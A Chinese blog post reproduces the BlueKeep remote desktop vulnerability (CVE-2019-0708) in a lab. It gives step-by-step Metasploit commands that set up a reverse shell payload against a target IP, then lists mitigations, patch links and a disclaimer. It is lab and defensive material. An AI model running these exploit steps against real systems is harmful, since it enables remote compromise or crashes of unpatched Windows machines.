• 欢迎访问本站网站,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏吧

CVE-2019-0708远程桌面漏洞复现处置建议

网络安全 admin 6个月前 (10-18) 148次浏览 已收录 0个评论 扫描二维码

本测试环境在虚拟机进行


漏洞影响的产品版本包括:

  1. Windows 7
  2. Windows Server 2008
  3. Windows XP
  4. Windows Server 2003 SP2 x64

复制代码

搜索:search 0708
使用模块:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

  1. show payloads 查看可选载荷
  2.  show options  查看需要填写的选项

载荷 :set payload generic/shell_reverse_tcp
设置目标ip :set RHOSTS 172.20.10.6
设置kali ip:set LHOST 172.20.10.3
设置端口:set LPORT 4444
设置受害机机器架构 set target id数字(可选为0-4)
执行利用: exploit
运行成功以后目标系统出现蓝屏,虽然现阶段只是让目标蓝屏,但是对这个漏洞的利用手段绝对不会只有这样, 即使已经开启防火墙也没有用。

CVE-2019-0708远程桌面漏洞复现处置建议


漏洞处置建议
1、禁用远程桌面服务。 2、通过主机防火墙对远程桌面服务端口进行阻断(默认为TCP端口 3389)


微软官方已发布补丁修复此漏洞: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
参考链接
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
https://msrc-blog.microsoft.com/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/
https://github.com/rapid7/metasploit-framework/pull/12283?from=timeline&isappinstalled=0
免责声明
CVE-2019-0708远程桌面漏洞复现处置建议

与本站提供的代码或者工具从事任何有关违法犯罪行为或活动的仅由您自己承担。滥用本网站上的信息可能会导致,有关人员提起刑事诉讼。如果对滥用本工具中的信息以从事违法犯罪行为,被追究责任的后果自负,作者将不承担任何责任。
编写此类文章的目的是为了介绍我们网络中的一些黑客攻击方法和被攻击后的现象来让大家认识到网络攻击究竟是怎样的,以此来加强大家的识别能力从而保护自己虚拟财产的安全,学技术不是为了搞破坏,而是为了更好的去保护我们祖国的网络安全!


本站的文章和资源来自互联网或者站长的原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:CVE-2019-0708远程桌面漏洞复现处置建议
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址